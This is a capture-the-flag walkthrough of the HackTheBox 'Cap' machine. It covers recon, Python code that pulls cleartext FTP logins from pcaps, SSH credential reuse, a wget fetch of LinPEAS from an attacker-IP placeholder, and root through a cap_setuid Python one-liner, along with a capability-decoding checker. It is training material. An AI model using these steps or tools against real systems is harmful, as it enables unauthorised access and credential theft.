Working with Linux Capabilities | Cap HackTheBox
A HackTheBox challenge focused on pcap analysis, service enumeration, and Linux capability exploitation.
Cap | Linux
Difficulty: Easy–Medium
Tags: PCAP, FTP creds, SSH, privesc, capabilities
Tools Used: Nmap, Gobuster, Wireshark, LinPEAS, getcap, Python
A surgical box with a lesson in stealth. Cap walks you through a practical, real-world example of how cleartext protocols and Linux capabilities combine into a clean escalation path. No guessing games. No overengineered rabbit holes. Just methodical recon, tight analysis, and one bad permission away from root.
Initial Enumeration
We start with a fast scan to get the lay of the land:
nmap -sC -F 10.129.205.117 -oN init-scan
The results gave us three targets:
FTP on port 21
SSH on port 22
HTTP on port 80 (served via Gunicorn)
With web services running, we turn to Gobuster to surface hidden paths:
gobuster dir --url http://10.129.205.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Found: /capture/, a directory serving downloadable .pcap files.
Credential Hunting via PCAP
Pulled the first file:
http://10.129.205.117/capture/0
Opened it in Wireshark with the display filter ftp (or right-click any port-21 packet and Follow TCP Stream). Within seconds, the login exchange shows up in the clear: classic cleartext leak.
Request: USER ***an
Request: PASS *********RM3!
FTP + PCAP = plaintext creds. An old problem, still deadly.
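Wireshark is the fastest way to eyeball this, but the same extraction is a few lines of Python once you know the pcap record layout. The block below is an added example written for this writeup, not code from the original post: a dependency-free classic-pcap reader that walks Ethernet/IPv4/TCP frames, keeps only client-to-server traffic to port 21 and pairs each USER with the PASS that follows on the same flow. The capture it parses is constructed inline (the client address and the demo_user/demo_pass! credentials are made up; only the target IP comes from the scan above), so it runs offline; pass a real capture as the first argument to scan it instead (the script name is whatever you save it as).

```python
import struct
import sys
from typing import Dict, Iterator, List, Optional, Tuple

# Added example, not from the original post. Understands only the classic pcap
# container (not pcapng) with Ethernet/IPv4/TCP frames; checksums are ignored.
LINKTYPE_ETHERNET = 1
FTP_PORT = 21


def _records(pcap: bytes) -> Iterator[Tuple[float, bytes]]:
    """Yield (timestamp, frame) for each record in a classic pcap file."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":      # 0xa1b2c3d4 written little-endian
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic microsecond pcap (pcapng/nanosecond not handled)")
    _vmaj, _vmin, _zone, _sig, _snaplen, linktype = struct.unpack(endian + "HHiIII", pcap[4:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield ts_sec + ts_usec / 1e6, pcap[off:off + incl_len]
        off += incl_len


def _tcp_payload(frame: bytes) -> Optional[Tuple[str, int, str, int, bytes]]:
    """Return (src_ip, sport, dst_ip, dport, payload), or None if not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType must be IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                        # IP protocol 6 = TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src_ip = ".".join(map(str, ip[12:16]))
    dst_ip = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4                             # TCP header length in bytes
    return src_ip, sport, dst_ip, dport, tcp[doff:]


def extract_ftp_logins(pcap: bytes) -> List[Dict[str, str]]:
    """Pair each client's USER with the PASS sent afterwards on the same TCP flow."""
    pending: Dict[Tuple[str, int], str] = {}
    found: List[Dict[str, str]] = []
    for _ts, frame in _records(pcap):
        parsed = _tcp_payload(frame)
        if parsed is None:
            continue
        src_ip, sport, dst_ip, dport, payload = parsed
        if dport != FTP_PORT or not payload:             # only client -> server control traffic
            continue
        line = payload.split(b"\r\n", 1)[0].decode("ascii", "replace")
        flow = (src_ip, sport)
        if line.upper().startswith("USER "):
            pending[flow] = line[5:]
        elif line.upper().startswith("PASS ") and flow in pending:
            found.append({"server": dst_ip, "client": f"{src_ip}:{sport}",
                          "user": pending.pop(flow), "password": line[5:]})
    return found


def _frame(src_ip: str, sport: int, dst_ip: str, dport: int, payload: bytes) -> bytes:
    """Build a minimal Ethernet/IPv4/TCP frame (checksums left zero; the reader ignores them)."""
    eth = b"\x00" * 6 + b"\x00" * 5 + b"\x01" + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp


def build_sample_pcap() -> bytes:
    """Constructed capture: one FTP login plus an HTTP packet that must be ignored."""
    client, server = "10.10.14.5", "10.129.205.117"     # client address is made up
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    frames = [
        _frame(server, 21, client, 54321, b"220 (vsFTPd 3.0.3)\r\n"),
        _frame(client, 54321, server, 21, b"USER demo_user\r\n"),
        _frame(server, 21, client, 54321, b"331 Please specify the password.\r\n"),
        _frame(client, 54321, server, 21, b"PASS demo_pass!\r\n"),
        _frame(client, 54322, server, 80, b"GET / HTTP/1.1\r\n\r\n"),
    ]
    return hdr + b"".join(struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
                          for i, f in enumerate(frames))


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for login in extract_ftp_logins(data):
        print(f"{login['client']} -> {login['server']}: USER {login['user']} PASS {login['password']}")
```

Pairing on the (client IP, client port) flow rather than on packet order matters on a busy capture where several FTP sessions interleave; the same idea covers other cleartext logins (POP3, IMAP, Telnet) by changing the port and the command prefixes.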
Logged in via FTP:
ftp 10.129.205.117
Used the credentials, got in clean, and grabbed the user.txt flag.
SSH Access & Local Enumeration
Reused the same creds over SSH:
ssh user@10.129.205.117
No sudo perms:
sudo -l
No juicy cron jobs, no fun SUIDs. Time to bring in LinPEAS.
Uploaded and executed:
python3 -m http.server 5555 # on attacker box
wget http://<attacker-ip>:5555/linpeas.sh # on target
chmod +x linpeas.sh
./linpeas.sh
LinPEAS ran loud but revealed nothing immediate. So we go quiet—manual post-ex checks.
Linux Capabilities ➤ Root
Linux capabilities break root's privileges into finer-grained units. That is good for security, until someone assigns the wrong capability to the wrong binary; on an interpreter, a few of them are as good as a SUID root shell.
Time to scan:
getcap -r / 2>/dev/null
Found:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
That cap_setuid is the crown jewel. With the effective bit (+e) set, any process that executes this Python binary starts with cap_setuid usable, so a plain setuid(0) succeeds and the interpreter runs as root. No SUID bit, so a find / -perm -4000 sweep walks straight past it, and ls -l gives nothing away: file capabilities live in the security.capability extended attribute, which is why getcap is the tool for this check. The cap_net_bind_service beside it is plausibly the intended grant (Gunicorn serving port 80 as an unprivileged user); cap_setuid is the overreach, and setcap -r /usr/bin/python3.8 would strip both.
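To make the "no SUID bit, no alarms" point concrete, here is an added example (written for this writeup, not code from the original post or from libcap) that does what getcap does by hand: read the security.capability extended attribute and decode the kernel's struct vfs_cap_data into the cap_setuid,cap_net_bind_service+eip text shown above, flagging the capabilities that hand over root on an attacker-controlled binary. The struct layout and capability numbering follow the kernel headers; the DANGEROUS set is my own selection, and the sample xattr bytes are constructed to match the python3.8 finding so the decoder runs offline.

```python
import os
import struct
from typing import Dict, Iterator, List, Optional, Tuple

# Added example, not from the original post. Layout follows the kernel's
# struct vfs_cap_data: revision 2 is 20 bytes, revision 3 appends a 4-byte rootid.
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_2 = 0x02000000
VFS_CAP_REVISION_3 = 0x03000000
VFS_CAP_FLAGS_EFFECTIVE = 0x000001

# Index = capability number from include/uapi/linux/capability.h.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]

# My own selection: caps that lead to root (or equivalent) with little effort
# when granted to an interpreter or any binary whose input the attacker controls.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}


def _cap_name(bit: int) -> str:
    return CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"cap_{bit}"


def decode_vfs_caps(raw: bytes) -> Dict[str, object]:
    """Decode raw security.capability bytes into a getcap-style string plus the sets."""
    if len(raw) < 20:
        raise ValueError("too short for struct vfs_cap_data")
    magic_etc, p_lo, i_lo, p_hi, i_hi = struct.unpack("<IIIII", raw[:20])
    rev = magic_etc & VFS_CAP_REVISION_MASK
    if rev not in (VFS_CAP_REVISION_2, VFS_CAP_REVISION_3):
        raise ValueError(f"unsupported vfs_cap_data revision {rev:#010x}")
    rootid = 0
    if rev == VFS_CAP_REVISION_3:
        if len(raw) < 24:
            raise ValueError("revision 3 xattr is missing its rootid")
        rootid = struct.unpack("<I", raw[20:24])[0]
    permitted = (p_hi << 32) | p_lo
    inheritable = (i_hi << 32) | i_lo
    effective = bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE)   # one bit: all permitted become effective

    # Group caps by the flag letters they carry, the way libcap's cap_to_text() prints them.
    groups: Dict[str, List[str]] = {}
    for bit in range(64):
        flags = ""
        if effective and permitted >> bit & 1:
            flags += "e"
        if inheritable >> bit & 1:
            flags += "i"
        if permitted >> bit & 1:
            flags += "p"
        if flags:
            groups.setdefault(flags, []).append(_cap_name(bit))
    text = " ".join(f"{','.join(caps)}+{flags}" for flags, caps in groups.items())
    dangerous = sorted(c for caps in groups.values() for c in caps if c in DANGEROUS)
    return {"text": text, "permitted": permitted, "inheritable": inheritable,
            "effective": effective, "rootid": rootid, "dangerous": dangerous}


def read_file_caps(path: str) -> Optional[Dict[str, object]]:
    """Per-file step of getcap: the security.* xattr is readable without privilege."""
    try:
        raw = os.getxattr(path, "security.capability", follow_symlinks=False)
    except (OSError, AttributeError):   # ENODATA (no caps), EPERM, or a non-Linux platform
        return None
    return decode_vfs_caps(raw)


def find_dangerous_caps(root: str = "/") -> Iterator[Tuple[str, str, List[str]]]:
    """Walk the tree like getcap -r and yield only files carrying a DANGEROUS capability."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            info = read_file_caps(os.path.join(dirpath, name))
            if info and info["dangerous"]:
                yield os.path.join(dirpath, name), str(info["text"]), list(info["dangerous"])


def sample_xattr_setuid_bind() -> bytes:
    """Constructed xattr matching the python3.8 finding: cap_setuid,cap_net_bind_service+eip."""
    caps = (1 << 7) | (1 << 10)
    return struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, caps, caps, 0, 0)


if __name__ == "__main__":
    print("sample:", decode_vfs_caps(sample_xattr_setuid_bind())["text"])
    for path, text, bad in find_dangerous_caps("/"):
        print(f"{path} = {text}   <-- {', '.join(bad)}")
```

Because the attribute is world-readable, this runs as the low-privileged user exactly like getcap -r does; the point of decoding it yourself is to see that the whole grant is 20 bytes of metadata that never touches the mode bits, which is why SUID-oriented checks miss it.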
From GTFOBins:
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Boom. Root shell.
Final proof:
whoami
root
cat /root/root.txt
Summary & Review
This machine is tight, quiet, and effective:
User path:
Web enum ➤ /capture/
PCAP analysis ➤ FTP creds
FTP login ➤ user flag
Root path:
SSH reuse ➤ shell as user
LinPEAS ➤ no hits
Manual getcap ➤ Python with cap_setuid
GTFOBins ➤ root shell via Python
Command Recap
nmap -sC -F 10.129.205.117 -oN init-scan
gobuster dir --url http://10.129.205.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Download PCAP and open in Wireshark
ftp 10.129.205.117
ssh user@10.129.205.117
python3 -m http.server 5555
wget http://<attacker-ip>:5555/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
getcap -r / 2>/dev/null
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Final Thoughts
FTP creds in the open. Python with quiet privileges. No noise, just precision.
Cap proves that small oversights become massive attack surfaces when chained right. Always check PCAPs. Always check capabilities.
Another one rooted. On to the next.